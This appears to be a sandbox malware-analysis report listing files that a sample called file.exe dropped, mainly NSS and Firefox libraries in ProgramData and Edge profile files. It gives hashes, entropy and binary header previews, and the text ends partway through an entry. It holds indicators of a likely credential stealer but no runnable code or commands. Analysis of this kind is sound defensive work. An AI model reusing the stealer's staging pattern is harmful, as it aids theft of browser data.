SHA-512:	1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\JoYUT4N.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	443
Entropy (8bit):	5.347274615985407
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1WzAbDLI4MNepQZav:ML9E4KQMsXE4Npv
MD5:	F73EF0CF34F9748349B7DC26D23369A1
SHA1:	9F1AA6A1896EE82B13E910AFF27CB179ECAA77B5
SHA-256:	6B8272C1059743AA45FBEB2E303FEFB6F591D3D374FB78252432881E38E21EFD
SHA-512:	C848DEE56D1BB8ABED56C0424879344F852BFA5147D529183A66C98BC303C225DCF5D7ADCF6B25B4946D0ED14023E0B5DB7D2A2C2789727949478DE64A4BAA13
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2d86666d-b116-498a-b55d-b48bd924692e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44945
Entropy (8bit):	6.095075975328806
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWc5i1zNt4Y9EpAj2A48EcKJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynHYNKtSmd6qE7lFoC
MD5:	BB5549F4EE5911520C2DEFC8E363EF17
SHA1:	4D1867D9ECF0ACAEBD78863748AB67ED7BB71688
SHA-256:	0DD8F463A632C1EF96661E963454F1FA65BB82324757AACA39ECED4F676E843F
SHA-512:	52AE0849791A2B047E164E279E355DDE3FA6973DC4CE29B873D54C1DC2D2A5D0BCEB9255E6BB5BECDA5E4C4AA97EC6A2B4829596FE533744A85838977F6B06B0
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9692eda6-89c4-4464-adf4-bc4c55aaae81.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44922
Entropy (8bit):	6.095011886482211
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWo5i1zNt4YNcHKD8FLO7KJDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynRY5KtSmd6qE7lFoC
MD5:	DC9B274DA2D9AECE1C609A533D0A74D6
SHA1:	8A1AD0947B02734DFA7A385531EE84D0BBC8B721
SHA-256:	2C9A42A9B86F3D3C05CC623584849176FE84C6A9E1EFE9905C3775FA1D32C374
SHA-512:	CF34CDFDF6FE15FE15602B429647A356860E924450845AD291008E5038B1A11A2419422D3B1447CFAA03104D4F26D8B5213AFCED747D994189546D72D002C519
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67541AA2-238C.pma

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4194304
Entropy (8bit):	0.04670205357494601
Encrypted:	false
SSDEEP:	192:jLMW0m5tmgnOAt6YRrJgA8x5XSggykfhbNNETdIIdGRQchvMAB1YGAWn8y08TcmQ:/P0UtHzgk9hZiuxMADYy08T2RGOD
MD5:	1C8F1DBAD4303ABED002258A1E9391A2
SHA1:	A3DD120D71B4DB749D5D9392DAF1C9252E5914BD
SHA-256:	98B42E81D76D644EF30289DEC9F15E540E74B86F95C20CC621756C8890F38501
SHA-512:	9F6B28EE79D90C90005A17FB469F30059528D6FE709E6E934756DEF4ADB47ED90D30DE6B49C5A132B4891EE9922C30A4FE3CA426A355557949215F9A7B1C64CF
Malicious:	false
Preview:	...@..@...@.....C.].....@................e...U..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30...............117.0.2045.55-64..".en-GB...Windows NT..10.0.190452l..x86_64..?........".lubufd20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@....................................w..U?:K...G...W6.>.........."....."...24.."."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U=".:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...Nb.X9.I@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	4.0984945491284295
Encrypted:	false
SSDEEP:	3:FiWWltlcUpPmPIijS3XbnbO6YBVP/Sh/JzvbYuDRBOc7cEJHCll:o1cUh4Y3LbO/BVsJDbYuDRBOycd
MD5:	AFAC5E4CC1213807ACB7D1A0F61BCF99
SHA1:	FEDCA0A829A0DBCCD1E9D7048398372FF9604783
SHA-256:	FF48F538CBF3D665C9B115D6F3F6459E0CD7D9DF368E921E5A4BF2CA88E3C55F
SHA-512:	44F1A7E8C8DD1D5CE625AE26ED4074900A979ACD34BAFB3D3B354145690D37D34E07F2D0D9DEE81BE80EAFA9E3973AB11AD6E85EB23A804958584D8DB4902D66
Malicious:	false
Preview:	sdPC.....................cT..\.E.....P."+jDg7C0j+BlQ1Nj+QPG7Safjq+2ZvoQsMhxZL1Gpc+U="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................7aa5fc64-f4df-45d8-92ed-89470ca1c2d2............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.6612262562697895
Encrypted:	false
SSDEEP:	3:NYLFRQZ:ap2Z
MD5:	B64BD80D877645C2DD14265B1A856F8A
SHA1:	F7379E1A6F8CE062E891C56736C789C7EA77CD6A
SHA-256:	83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
SHA-512:	734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
Malicious:	false
Preview:	117.0.2045.55

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089814894837858
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMVkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynZKkzItSmd6qE7lFoC
MD5:	1F89D28E8E2E6EBB2EC84081FD96ED09
SHA1:	A80267678A7444C5C7A8BE18B1C1312AC7F2F891
SHA-256:	F9A228B40D98383F7C6A7BBF23A5564C8397AE117E3C572CB5748DBD82D7706F
SHA-512:	9EC1D0049B15FAEC25724BD552A81DE92AB1C3AE6A0A098B78374108488E84571EED64532BF4D6E6392DCD56EB4944E39B9A08B77D21DFF55485869EE4C79CA8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3956b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089814894837858
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMVkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynZKkzItSmd6qE7lFoC
MD5:	1F89D28E8E2E6EBB2EC84081FD96ED09
SHA1:	A80267678A7444C5C7A8BE18B1C1312AC7F2F891
SHA-256:	F9A228B40D98383F7C6A7BBF23A5564C8397AE117E3C572CB5748DBD82D7706F
SHA-512:	9EC1D0049B15FAEC25724BD552A81DE92AB1C3AE6A0A098B78374108488E84571EED64532BF4D6E6392DCD56EB4944E39B9A08B77D21DFF55485869EE4C79CA8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3958a.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089814894837858
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMVkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynZKkzItSmd6qE7lFoC
MD5:	1F89D28E8E2E6EBB2EC84081FD96ED09
SHA1:	A80267678A7444C5C7A8BE18B1C1312AC7F2F891
SHA-256:	F9A228B40D98383F7C6A7BBF23A5564C8397AE117E3C572CB5748DBD82D7706F
SHA-512:	9EC1D0049B15FAEC25724BD552A81DE92AB1C3AE6A0A098B78374108488E84571EED64532BF4D6E6392DCD56EB4944E39B9A08B77D21DFF55485869EE4C79CA8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a019.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089814894837858
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMVkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynZKkzItSmd6qE7lFoC
MD5:	1F89D28E8E2E6EBB2EC84081FD96ED09
SHA1:	A80267678A7444C5C7A8BE18B1C1312AC7F2F891
SHA-256:	F9A228B40D98383F7C6A7BBF23A5564C8397AE117E3C572CB5748DBD82D7706F
SHA-512:	9EC1D0049B15FAEC25724BD552A81DE92AB1C3AE6A0A098B78374108488E84571EED64532BF4D6E6392DCD56EB4944E39B9A08B77D21DFF55485869EE4C79CA8
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3a029.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089814894837858
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWrdi1zNtPMVkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynZKkzItSmd6qE7lFoC
MD5:	1F89D28E8E2E6EBB2EC84081FD96ED09
SHA1:	A80267678A7444C5C7A8BE18B1C1312AC7F2F891
SHA-256:	F9A228B40D98383F7C6A7BBF23A5564C8397AE117E3C572CB5748DBD82D7706F
